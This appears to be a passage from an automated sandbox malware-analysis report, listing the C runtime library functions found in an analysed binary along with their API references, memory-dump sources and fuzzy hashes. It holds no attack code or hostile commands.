Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01009FA1,010086C8,0100784F), ref: 01009FB8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01009FC6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01009FDF
SetLastError.KERNEL32(00000000,01009FA1,010086C8,0100784F), ref: 0100A031

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 20eeb87dc7b222275a1046cafd85f6cd0c2d5c93b597f971d44ca68dad3d259d
Instruction ID: 1145e776ede87507b08c23b994595945557a66bac9607e3e8be80559535c7588
Opcode Fuzzy Hash: 20eeb87dc7b222275a1046cafd85f6cd0c2d5c93b597f971d44ca68dad3d259d
Instruction Fuzzy Hash: A201B5362093129EF6B769B87D84BAA2A85FB12778F30022AF590820D1EF5A4C005384

Function 01053FAB Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 01053F02

Part of subcall function 01049D30: __mtinitlocknum.LIBCMT ref: 01049D46
Part of subcall function 01049D30: __amsg_exit.LIBCMT ref: 01049D52

_free.LIBCMT ref: 01053F29
__lock.LIBCMT ref: 01053F42
___removelocaleref.LIBCMT ref: 01053F51
___freetlocinfo.LIBCMT ref: 01053F6A
_free.LIBCMT ref: 01053F87

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 1181530324-0
Opcode ID: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
Instruction ID: dd3a3608fe59c91bca211eedbf33300d475a417bf6e0201bf1bc4c13fc9cde50
Opcode Fuzzy Hash: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
Instruction Fuzzy Hash: B6119A71504302ABEBB0AF68D84479F76F4BF18BA4F204569E9C89B1D4CB3498808B25

Function 01010CA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6D81AB67,?,?,00000000,01021D08,000000FF,?,01010C30,01010D60,?,01010C04,00000000), ref: 01010CD5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01010CE7
FreeLibrary.KERNEL32(00000000,?,?,00000000,01021D08,000000FF,?,01010C30,01010D60,?,01010C04,00000000), ref: 01010D09

Strings

mscoree.dll, xrefs: 01010CCE
CorExitProcess, xrefs: 01010CDF

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0820fd00012a810fd2d2d9717415788b6ac2d5d50c7f366c42dc40d9e6765985
Instruction ID: eb5124f4deae23e3e20bc48f0307ff5bc15bec6f84a165d1d286695124fbab8d
Opcode Fuzzy Hash: 0820fd00012a810fd2d2d9717415788b6ac2d5d50c7f366c42dc40d9e6765985
Instruction Fuzzy Hash: C501A231900629EFDB319F84CC45FAEBBB8FB04B10F504129F991A6688DB7DA800CB90

Function 01040BA8 Relevance: 7.8, APIs: 5, Instructions: 297COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01040C2F
_memset.LIBCMT ref: 01040C40
_memset.LIBCMT ref: 01040D08
_memset.LIBCMT ref: 01040D74
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040E96

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2583058844-0
Opcode ID: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
Instruction ID: bc54ea21be9a891884c2626b96832e1d98286fdfe147872e62d8d87223ad15ac
Opcode Fuzzy Hash: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
Instruction Fuzzy Hash: 51C119B2D0022AABDF21EF64DC85AEE77BDAF08205F0144F5FA49B3150DA359B858F54

Function 01050B17 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 01050B2B
__init_pointers.LIBCMT ref: 01050BDD
__calloc_crt.LIBCMT ref: 01050C4B
__initptd.LIBCMT ref: 01050C70

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 3132042578-0
Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction ID: 0158150b6f0b473c06122cb2dc51f409cc84a8be9794fea17dd25f75ed209cf3
Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction Fuzzy Hash: 38315830D003559AEBA2AF7DAD48A4A3FE4EF45722B10067AE990D32B5DBB4D440CF49

Function 0104BA22 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0104BA6B
DName::operator+.LIBCMT ref: 0104BA72
DName::DName.LIBCMT ref: 0104BA94
DName::operator+.LIBCMT ref: 0104BA9B
DName::operator+.LIBCMT ref: 0104BAA2

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
Instruction ID: fcf7f63b47591824fde2f18258737e899d3f55cccc0500bdb2a845f1e5578e17
Opcode Fuzzy Hash: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
Instruction Fuzzy Hash: 290192B0A4020AAFCF14EFA8D885EEDBBB5EF48705F404069E5419B291EA70EA458784

Function 0100417D Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01004189
int.LIBCPMT ref: 0100419C

Part of subcall function 010016B4: std::_Lockit::_Lockit.LIBCPMT ref: 010016C5
Part of subcall function 010016B4: std::_Lockit::~_Lockit.LIBCPMT ref: 010016DF

std::_Facet_Register.LIBCPMT ref: 010041CF
std::_Lockit::~_Lockit.LIBCPMT ref: 010041E5
Concurrency::cancel_current_task.LIBCPMT ref: 010041F0

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: bcaf24800f7739e179108867a852dff87c377d90bb271cedbe9af8908eb8f20e
Instruction ID: 8b179aea4392c134143732f7a7614b74a9b5e55e17c39dcd3b5e4a254a11cd8a
Opcode Fuzzy Hash: bcaf24800f7739e179108867a852dff87c377d90bb271cedbe9af8908eb8f20e
Instruction Fuzzy Hash: 7A018476600115ABEB16FB54D8448ED7BA9EFA0660F240199EA85E72D0EF30DE41C7D8

Function 01003AF8 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01003B04
int.LIBCPMT ref: 01003B17

Part of subcall function 010016B4: std::_Lockit::_Lockit.LIBCPMT ref: 010016C5
Part of subcall function 010016B4: std::_Lockit::~_Lockit.LIBCPMT ref: 010016DF

std::_Facet_Register.LIBCPMT ref: 01003B4A
std::_Lockit::~_Lockit.LIBCPMT ref: 01003B60
Concurrency::cancel_current_task.LIBCPMT ref: 01003B6B

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 90614f8da8ac5bf38ed15bf12401004ef9a3b2b64a8502c17ac5b85ce57e5095
Instruction ID: 881da2d0ed8de0208732ead4ed5f133ec3a7ab629f2a7f248abc23e4791f540c
Opcode Fuzzy Hash: 90614f8da8ac5bf38ed15bf12401004ef9a3b2b64a8502c17ac5b85ce57e5095
Instruction Fuzzy Hash: 6001D436500519ABEB17FB54D8449EE77A8AF91660F140249EA819B2D0EF30DE418B94

Function 0100404F Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0100405C
int.LIBCPMT ref: 0100406F

Part of subcall function 010016B4: std::_Lockit::_Lockit.LIBCPMT ref: 010016C5
Part of subcall function 010016B4: std::_Lockit::~_Lockit.LIBCPMT ref: 010016DF

std::_Facet_Register.LIBCPMT ref: 010040A2
std::_Lockit::~_Lockit.LIBCPMT ref: 010040B8
Concurrency::cancel_current_task.LIBCPMT ref: 010040C3

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 782a10ba835866f91a945d4295b0b7b4f047b82e9f2fb271e6d9c8ab5542c572
Instruction ID: a923d04aaf6a55817364cb738245ff36da4df9570f56a9d507a08994b9a8d0ec
Opcode Fuzzy Hash: 782a10ba835866f91a945d4295b0b7b4f047b82e9f2fb271e6d9c8ab5542c572
Instruction Fuzzy Hash: C0018436904115ABEB26FB68D8448DE7BA8AF60650F140199EAC1E72D4EF30DA41C7D9

Function 01004DC1 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 01004DC8
std::_Lockit::_Lockit.LIBCPMT ref: 01004DD3
std::locale::_Setgloballocale.LIBCPMT ref: 01004DEE
_Yarn.LIBCPMT ref: 01004E04
std::_Lockit::~_Lockit.LIBCPMT ref: 01004E41

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
String ID:
API String ID: 156189095-0
Opcode ID: fe648cc3187bf2a1c7118a40e7358f92e146fd199df8073a231514f206f5e66e
Instruction ID: 0884ff664f9d11ce85716df5e87b0282e462f1871707359ebfb8ed0a77f2cdca
Opcode Fuzzy Hash: fe648cc3187bf2a1c7118a40e7358f92e146fd199df8073a231514f206f5e66e
Instruction Fuzzy Hash: 7C01B1756001629BE717FF60D4549BD7BA1FF94210F290149DAC1973C0DF795E42CB89

Function 01053FB6 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 01053FC2

Part of subcall function 01050954: __getptd_noexit.LIBCMT ref: 01050957
Part of subcall function 01050954: __amsg_exit.LIBCMT ref: 01050964

__calloc_crt.LIBCMT ref: 01053FCD
__lock.LIBCMT ref: 01054003
___addlocaleref.LIBCMT ref: 0105400F
__lock.LIBCMT ref: 01054023

Part of subcall function 0104FAF4: __getptd_noexit.LIBCMT ref: 0104FAF4

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 2820776222-0
Opcode ID: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
Instruction ID: 27b653da8ee0f59f90efcab314de2cab79346519eb294804ca862e60d5543765
Opcode Fuzzy Hash: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
Instruction Fuzzy Hash: DB017C71501302EBEBA0BBB8D841BDE77A0AF18724F204669F8D49B2D0CB7459408B65

Function 01052719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 01052725

Part of subcall function 01050954: __getptd_noexit.LIBCMT ref: 01050957
Part of subcall function 01050954: __amsg_exit.LIBCMT ref: 01050964

__getptd.LIBCMT ref: 0105273C
__amsg_exit.LIBCMT ref: 0105274A
__lock.LIBCMT ref: 0105275A
__updatetlocinfoEx_nolock.LIBCMT ref: 0105276E

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction ID: e5ca9dd3e1c2a8da37704ce55e77e2001938ac607703de02c7309fc10d2eec7b
Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction Fuzzy Hash: AFF0F072A00716DBEBA1FBA8984178F76E07F04324F110169ECD4A61D0CB245400CA5A

Function 0100B0F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0100B0A3,00000000,?,0108DCFC,?,?,?,0100B246,00000004,InitializeCriticalSectionEx,01023BB8,InitializeCriticalSectionEx), ref: 0100B0FF
GetLastError.KERNEL32(?,0100B0A3,00000000,?,0108DCFC,?,?,?,0100B246,00000004,InitializeCriticalSectionEx,01023BB8,InitializeCriticalSectionEx,00000000,?,0100AFFD), ref: 0100B109
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0100B131

Strings

api-ms-, xrefs: 0100B116

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 8f2f57d9b3e4c0598369dd985b71e5e27740b1e8c7364106920a80486c2b2cbf
Instruction ID: 42d9f4853bc9ec7c98a8984f31053d6b0de20abc5122f0d4efabe2ad995ff029
Opcode Fuzzy Hash: 8f2f57d9b3e4c0598369dd985b71e5e27740b1e8c7364106920a80486c2b2cbf
Instruction Fuzzy Hash: 90E04834240204B7FF321EA1DC46F593F96AB00F50F644060FA8DE80D6E7AAD560C694

Function 01017495 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(6D81AB67,00000000,00000000,00000000), ref: 010174F8

Part of subcall function 0101927A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01018D21,?,00000000,-00000008), ref: 01019326

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 01017753
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0101779B
GetLastError.KERNEL32 ref: 0101783E

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9653e18ba59f1907eb7cc24da0b1a3f0e2739ea233e4d21a086ddb71d0fd181a
Instruction ID: 50cc31a9aafad598ed0a4fa00a2e4aae1639289b2893b55e6d97317fa1c15dae
Opcode Fuzzy Hash: 9653e18ba59f1907eb7cc24da0b1a3f0e2739ea233e4d21a086ddb71d0fd181a
Instruction Fuzzy Hash: C6D17875E002499FDB15CFE8C880AEDBBB5FF08304F18416AE9A6EB349D734A941CB50

Function 0103A066 Relevance: 6.3, APIs: 4, Instructions: 325COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0103A097
_memset.LIBCMT ref: 0103A0B7
_memset.LIBCMT ref: 0103A0C8
_memset.LIBCMT ref: 0103A0D9

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
Instruction ID: 0e0e07b73cb52590ee55f9daf2617556d2d09d3fa2fa4116369c4a57ae60c38b
Opcode Fuzzy Hash: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
Instruction Fuzzy Hash: FFD1C5B191012EEAEB20EB94DD41AE9B77CAF54704F1058E7E588B7050DA70BF89CF61

Function 0100A0C1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0100A188
___AdjustPointer.LIBCMT ref: 0100A1AB
___AdjustPointer.LIBCMT ref: 0100A247

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 34295a59a64d584f6b63c79b2485c7e0796f1c3709f9402184ba752fb2f6b713
Instruction ID: 1fe0b350ce6628e3ff9bae051cb1e7a958f5edb9ba409f86b68f4691caa1ab9f
Opcode Fuzzy Hash: 34295a59a64d584f6b63c79b2485c7e0796f1c3709f9402184ba752fb2f6b713
Instruction Fuzzy Hash: D451DE72B00306EFFB2B9F18D840BEA7BA4EF14250F144169EA824B2D0E735E980C790

Function 01044261 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01044286
_memset.LIBCMT ref: 01044295
_memset.LIBCMT ref: 01044455
_memset.LIBCMT ref: 01044467

Memory Dump Source

